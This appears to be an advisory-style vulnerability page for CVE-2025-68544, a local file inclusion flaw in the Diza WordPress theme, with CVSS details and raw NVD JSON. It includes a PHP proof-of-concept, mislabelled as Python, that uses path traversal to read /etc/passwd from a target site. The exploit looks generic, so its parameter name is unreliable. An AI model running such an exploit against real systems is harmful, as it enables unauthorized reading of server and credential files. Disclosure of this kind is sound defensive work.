Security Vulnerability Report
中文
CVE-2025-68544 CVSS 7.5 HIGH

CVE-2025-68544

Published: 2025-12-23 12:15:45
Last Modified: 2026-04-23 15:36:00

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Diza diza allows PHP Local File Inclusion.This issue affects Diza: from n/a through <= 1.3.15.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Diza WordPress Theme <= 1.3.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-68544 PoC - Diza Theme Local File Inclusion * Affected: Diza WordPress Theme <= 1.3.15 * Author: Security Researcher * Usage: Modify target URL and file path */ $target = 'http://target-site.com/'; $vulnerable_param = 'template'; $file_to_read = '/etc/passwd'; // LFI via path traversal $url = $target . '?' . $vulnerable_param . '=../../../../..' . $file_to_read; echo "[*] CVE-2025-68544 PoC\n"; echo "[*] Target: " . $target . "\n"; echo "[*] Trying to read: " . $file_to_read . "\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code == 200 && strpos($response, 'root:') !== false) { echo "[+] LFI Successful! File contents:\n"; echo $response; } else { echo "[-] LFI Failed or file not readable\n"; } ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68544", "sourceIdentifier": "[email protected]", "published": "2025-12-23T12:15:45.313", "lastModified": "2026-04-23T15:35:59.983", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Diza diza allows PHP Local File Inclusion.This issue affects Diza: from n/a through <= 1.3.15."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/diza/vulnerability/wordpress-diza-theme-1-3-15-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}